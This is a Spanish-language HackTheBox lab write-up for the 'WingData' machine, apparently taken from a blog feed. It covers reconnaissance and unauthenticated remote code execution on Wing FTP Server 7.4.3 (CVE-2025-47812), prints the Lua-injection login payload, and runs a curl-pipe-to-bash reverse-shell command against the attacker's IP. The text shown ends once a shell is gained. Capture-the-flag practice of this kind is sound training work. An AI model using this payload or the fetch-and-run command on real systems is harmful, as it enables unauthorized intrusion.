Hash-Sha-256-Salt on sckull https://sckull.github.io/tags/hash-sha-256-salt/ Recent content in Hash-Sha-256-Salt on sckull Hugo -- gohugo.io es Β©{year}, All Rights Reserved Sat, 27 Jun 2026 00:00:00 +0000 daily daily HackTheBox - WingData https://sckull.github.io/posts/wingdata/ Sat, 27 Jun 2026 00:00:00 +0000 Sat, 27 Jun 2026 00:00:00 +0000 https://sckull.github.io/posts/wingdata/ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/wingdata/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>En WingData descubrimos Wing FTP Server en una version vulnerable que permitio el acceso inicial. Los archivos de configuracion para este, permitieron exponer credenciales para un primer usuario. Escalamos privilegios a traves de una vulnerabilidad en TarFile de Python para la escritura de archivos a traves de enlaces simbolicos.</p> <![CDATA[ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/wingdata/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>En WingData descubrimos Wing FTP Server en una version vulnerable que permitio el acceso inicial. Los archivos de configuracion para este, permitieron exponer credenciales para un primer usuario. Escalamos privilegios a traves de una vulnerabilidad en TarFile de Python para la escritura de archivos a traves de enlaces simbolicos.</p> <table> <thead> <tr> <th>Nombre</th> <th style="text-align: center"><a href="https://app.hackthebox.com/machines/835">WingData</a></th> </tr> </thead> <tbody> <tr> <td><strong>OS</strong></td> <td style="text-align: center"><span><p class="os_type"> Linux <img src="https://sckull.github.io/images/icons/linux.png" class="img_type_os"/></p></span></td> </tr> <tr> <td><strong>Puntos</strong></td> <td style="text-align: center">20</td> </tr> <tr> <td><strong>Dificultad</strong></td> <td style="text-align: center">Easy</td> </tr> <tr> <td><strong>Fecha de Salida</strong></td> <td style="text-align: center">2026-02-14</td> </tr> <tr> <td><strong>IP</strong></td> <td style="text-align: center">10.129.2.158</td> </tr> <tr> <td><strong>Maker</strong></td> <td style="text-align: center"><span><p class="user_maker"> <a href="https://www.hackthebox.eu/home/users/profile/305136">WackyH4cker</a><img src="https://www.hackthebox.eu/badge/image/305136" class="img_user_maker"/> </p></span></td> </tr> <tr> <td> <a href="#" class="button" style="width: 72px; height: 30px; pointer-events: none;" data-color="default" target="_blank" rel="noreferrer"> <span class="button__text"> Rated </span> </a></td> <td style="text-align: center"><div class="box"><pre tabindex="0"><code class="language-chart" data-lang="chart">{ &#34;type&#34;: &#34;bar&#34;, &#34;data&#34;: { &#34;labels&#34;: [&#34;Cake&#34;, &#34;VeryEasy&#34;, &#34;Easy&#34;, &#34;TooEasy&#34;, &#34;Medium&#34;, &#34;BitHard&#34;,&#34;Hard&#34;,&#34;TooHard&#34;,&#34;ExHard&#34;,&#34;BrainFuck&#34;], &#34;datasets&#34;: [{ &#34;label&#34;: &#34;User Rated Difficulty&#34;, &#34;data&#34;: [66, 81, 231, 122, 53, 14, 9, 2, 4, 7], &#34;backgroundColor&#34;: [&#34;#9fef00&#34;,&#34;#9fef00&#34;,&#34;#9fef00&#34;, &#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;, &#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;] }] }, &#34;options&#34;: { &#34;scales&#34;: { &#34;xAxes&#34;: [{&#34;display&#34;: false}], &#34;yAxes&#34;: [{&#34;display&#34;: false}] }, &#34;legend&#34;: {&#34;labels&#34;: {&#34;fontColor&#34;: &#34;white&#34;}}, &#34;responsive&#34;: true } } </code></pre></div></td> </tr> </tbody> </table> <h1 id="recon">Recon</h1> <h2 id="nmap">nmap</h2> <p><code>nmap</code> muestra multiples puertos abiertos: http (80) y ssh (22).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Nmap 7.95 scan initiated Sat Feb 14 16:26:49 2026 as: /usr/lib/nmap/nmap --privileged -p22,80 -sV -sC -oN nmap_scan 10.129.2.158</span> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.129.2.158 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.067s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.66 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://wingdata.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.66 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl">Service Info: Host: localhost<span class="p">;</span> OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Sat Feb 14 16:27:01 2026 -- 1 IP address (1 host up) scanned in 11.95 seconds</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-site">Web Site</h2> <p>El sitio web nos redirige al dominio <code>wingdata.htb</code> el cual agregamos al archivo <code>/etc/hosts</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -sI 10.129.2.158 </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">301</span> Moved Permanently </span></span><span class="line"><span class="cl">Date: Sat, <span class="m">14</span> Feb <span class="m">2026</span> 22:28:39 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.66 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl">Location: http://wingdata.htb/ </span></span><span class="line"><span class="cl">Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>iso-8859-1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>El sitio expone una descripcion de una solucion para compartir archivos.</p> <p><img src="https://sckull.github.io/images/posts/htb/wingdata/2026_1402045382438.png" alt="image"></p> <h3 id="directory-brute-forcing">Directory Brute Forcing</h3> <p><code>feroxbuster</code> muestra contenido estatico dle sitio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ feroxbuster -u http://wingdata.htb -w <span class="nv">$CM</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ ___ __ __ __ __ __ ___ </span></span><span class="line"><span class="cl"><span class="p">|</span>__ <span class="p">|</span>__ <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> / <span class="sb">`</span> / <span class="se">\ \_</span>/ <span class="p">|</span> <span class="p">|</span> <span class="se">\ </span><span class="p">|</span>__ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\_</span>_, <span class="se">\_</span>_/ / <span class="se">\ </span><span class="p">|</span> <span class="p">|</span>__/ <span class="p">|</span>___ </span></span><span class="line"><span class="cl">by Ben <span class="s2">&#34;epi&#34;</span> Risher πŸ€“ ver: 2.13.0 </span></span><span class="line"><span class="cl">───────────────────────────┬────────────────────── </span></span><span class="line"><span class="cl"> 🎯 Target Url β”‚ http://wingdata.htb/ </span></span><span class="line"><span class="cl"> 🚩 In-Scope Url β”‚ wingdata.htb </span></span><span class="line"><span class="cl"> πŸš€ Threads β”‚ <span class="m">50</span> </span></span><span class="line"><span class="cl"> πŸ“– Wordlist β”‚ /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"> πŸ‘Œ Status Codes β”‚ All Status Codes! </span></span><span class="line"><span class="cl"> πŸ’₯ Timeout <span class="o">(</span>secs<span class="o">)</span> β”‚ <span class="m">7</span> </span></span><span class="line"><span class="cl"> 🦑 User-Agent β”‚ feroxbuster/2.13.0 </span></span><span class="line"><span class="cl"> πŸ’‰ Config File β”‚ /etc/feroxbuster/ferox-config.toml </span></span><span class="line"><span class="cl"> πŸ”Ž Extract Links β”‚ <span class="nb">true</span> </span></span><span class="line"><span class="cl"> 🏁 HTTP methods β”‚ <span class="o">[</span>GET<span class="o">]</span> </span></span><span class="line"><span class="cl"> πŸ”ƒ Recursion Depth β”‚ <span class="m">4</span> </span></span><span class="line"><span class="cl"> πŸŽ‰ New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest </span></span><span class="line"><span class="cl">───────────────────────────┴────────────────────── </span></span><span class="line"><span class="cl"> 🏁 Press <span class="o">[</span>ENTER<span class="o">]</span> to use the Scan Management Menuβ„’ </span></span><span class="line"><span class="cl">────────────────────────────────────────────────── </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 151l 333w 3905c http://wingdata.htb/assets/js/templatemo-custom.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 186l 505w 4928c http://wingdata.htb/assets/css/owl.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 251l 1069w 12492c http://wingdata.htb/index.html </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 193l 571w 5974c http://wingdata.htb/assets/js/animation.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 44l 333w 19982c http://wingdata.htb/assets/images/contact-decoration.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 4l 64w 23742c http://wingdata.htb/assets/css/fontawesome.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 496l 1721w 13281c http://wingdata.htb/assets/js/imagesloaded.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 149l 837w 67141c http://wingdata.htb/assets/images/about-left-image.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1577l 3269w 31620c http://wingdata.htb/assets/css/templatemo-space-dynamic.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 329l 1996w 148839c http://wingdata.htb/assets/images/banner-right-image.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 2l 1283w 86927c http://wingdata.htb/vendor/jquery/jquery.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 3158l 6952w 76080c http://wingdata.htb/assets/css/animated.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 3448l 10094w 93438c http://wingdata.htb/assets/js/owl-carousel.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 1002w 80223c http://wingdata.htb/vendor/bootstrap/js/bootstrap.bundle.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 10724l 20204w 204037c http://wingdata.htb/vendor/bootstrap/css/bootstrap.min.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 251l 1069w 12492c http://wingdata.htb/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 353c http://wingdata.htb/assets <span class="o">=</span>&gt; http://wingdata.htb/assets/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 357c http://wingdata.htb/assets/css <span class="o">=</span>&gt; http://wingdata.htb/assets/css/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 359c http://wingdata.htb/assets/fonts <span class="o">=</span>&gt; http://wingdata.htb/assets/fonts/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 360c http://wingdata.htb/assets/images <span class="o">=</span>&gt; http://wingdata.htb/assets/images/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 356c http://wingdata.htb/assets/js <span class="o">=</span>&gt; http://wingdata.htb/assets/js/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 353c http://wingdata.htb/vendor <span class="o">=</span>&gt; http://wingdata.htb/vendor/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 29w 360c http://wingdata.htb/vendor/jquery <span class="o">=</span>&gt; http://wingdata.htb/vendor/jquery/ </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h3 id="subdomain-discovery">Subdomain Discovery</h3> <p>Tras ejecutar <code>ffuf</code> este muestra el subdominio <code>ftp</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H <span class="s2">&#34;Host: FUZZ.wingdata.htb&#34;</span> -u http://wingdata.htb -fw <span class="m">21</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://wingdata.htb </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt </span></span><span class="line"><span class="cl"> :: Header : Host: FUZZ.wingdata.htb </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl"> :: Filter : Response words: <span class="m">21</span> </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ftp <span class="o">[</span>Status: 200, Size: 678, Words: 44, Lines: 10, Duration: 136ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>151265/151265<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">555</span> req/sec :: Duration: <span class="o">[</span>0:05:02<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="wing-ftp">Wing FTP</h1> <p>En el subdominio encontramos el login para <code>Wing FTP Server v7.4.3</code>. Las credenciales <code>anonymous:</code> son aceptadas.</p> <p><img src="https://sckull.github.io/images/posts/htb/wingdata/2026_1402045244224.png" alt="image"></p> <h2 id="cve-2025-47812">CVE-2025-47812</h2> <p><code>searchsploit</code> muestra que existe un exploit para una vulnerabilidad que permite la ejecucion remota de comandos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ searchsploit wing ftp 7.4.3 </span></span><span class="line"><span class="cl">---------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">---------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execu <span class="p">|</span> multiple/remote/52347.py </span></span><span class="line"><span class="cl">---------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span><span class="line"><span class="cl">❯ searchsploit -m multiple/remote/52347.py </span></span><span class="line"><span class="cl"> Exploit: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution <span class="o">(</span>RCE<span class="o">)</span> </span></span><span class="line"><span class="cl"> URL: https://www.exploit-db.com/exploits/52347 </span></span><span class="line"><span class="cl"> Path: /usr/share/exploitdb/exploits/multiple/remote/52347.py </span></span><span class="line"><span class="cl"> Codes: CVE-2025-47812 </span></span><span class="line"><span class="cl"> Verified: False </span></span><span class="line"><span class="cl">File Type: Python script, ASCII text executable </span></span><span class="line"><span class="cl">Copied to: /home/kali/htb/wingdata/52347.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>El exploit realiza una inyeccion de codigo Lua al realizar el login.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /loginok.html HTTP/1.1 </span></span><span class="line"><span class="cl">Host: &lt;target&gt; </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:139.0<span class="o">)</span> Gecko/20100101 Firefox/139.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Origin: &lt;target&gt; </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: &lt;target&gt;/login.html?lang<span class="o">=</span>english </span></span><span class="line"><span class="cl">Cookie: <span class="nv">client_lang</span><span class="o">=</span>english </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">username</span><span class="o">=</span>anonymous%00<span class="o">]]</span>%0dlocal+h+%3d+io.popen<span class="o">(</span><span class="s2">&#34;&lt;cmd&gt;&#34;</span><span class="o">)</span>%0dlocal+r+%3d+h%3aread<span class="o">(</span><span class="s2">&#34;*a&#34;</span><span class="o">)</span>%0dh%3aclose<span class="o">()</span>%0dprint<span class="o">(</span>r<span class="o">)</span>%0d--<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span> </span></span></code></pre></td></tr></table> </div> </div><p>Al realizar una solicitud a <code>/dir.html</code> se ejecutaria el comando.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /dir.html HTTP/1.1 </span></span><span class="line"><span class="cl">Host: &lt;target&gt; </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:139.0<span class="o">)</span> Gecko/20100101 Firefox/139.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: <span class="nv">UID</span><span class="o">=</span>&lt;uid_from_set-cookie&gt; </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span></code></pre></td></tr></table> </div> </div><p>El usuario por default a utilizar es <code>anonymous</code>, tras ejecutar el exploit observamos que fue aceptado y se realizo la ejecucion del comando indicado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python CVE-2025-47812.py </span></span><span class="line"><span class="cl">usage: CVE-2025-47812.py <span class="o">[</span>-h<span class="o">]</span> <span class="o">[</span>-u URL<span class="o">]</span> <span class="o">[</span>-f FILE<span class="o">]</span> <span class="o">[</span>-c COMMAND<span class="o">]</span> <span class="o">[</span>-v<span class="o">]</span> <span class="o">[</span>-o OUTPUT<span class="o">]</span> <span class="o">[</span>-U USERNAME<span class="o">]</span> </span></span><span class="line"><span class="cl">CVE-2025-47812.py: error: Either -u/--url or -f/--file must be specified. </span></span><span class="line"><span class="cl">❯ python CVE-2025-47812.py -u http://ftp.wingdata.htb -c id </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing target: http://ftp.wingdata.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sending POST request to http://ftp.wingdata.htb/loginok.html with command: <span class="s1">&#39;id&#39;</span> and username: <span class="s1">&#39;anonymous&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> UID extracted: 3a99e4d2002defd74c101523a2ed6087f528764d624db129b32c21fbca0cb8d6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sending GET request to http://ftp.wingdata.htb/dir.html with UID: 3a99e4d2002defd74c101523a2ed6087f528764d624db129b32c21fbca0cb8d6 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--- Command Output --- </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>wingftp<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>wingftp<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>wingftp<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,100<span class="o">(</span>users<span class="o">)</span>,106<span class="o">(</span>netdev<span class="o">)</span> </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---wingftp">User - wingftp</h1> <p>Ejecutamos una shell inversa a traves del exploit.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python CVE-2025-47812.py -u http://ftp.wingdata.htb -c <span class="s1">&#39;curl 10.10.15.60:8000/10.10.15.60:1335|bash&#39;</span> -U anonymous </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing target: http://ftp.wingdata.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sending POST request to http://ftp.wingdata.htb/loginok.html with command: <span class="s1">&#39;curl 10.10.15.60:8000/10.10.15.60:1335|bash&#39;</span> and username: <span class="s1">&#39;anonymous&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> UID extracted: 45e947099b3fbdd7e38d0884d9fd3736f528764d624db129b32c21fbca0cb8d6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sending GET request to http://ftp.wingdata.htb/dir.html with UID: 45e947099b3fbdd7e38d0884d9fd3736f528764d624db129b32c21fbca0cb8d6 </span></span></code></pre></td></tr></table> </div> </div><p>Logrando el acceso como wingftp.</p> 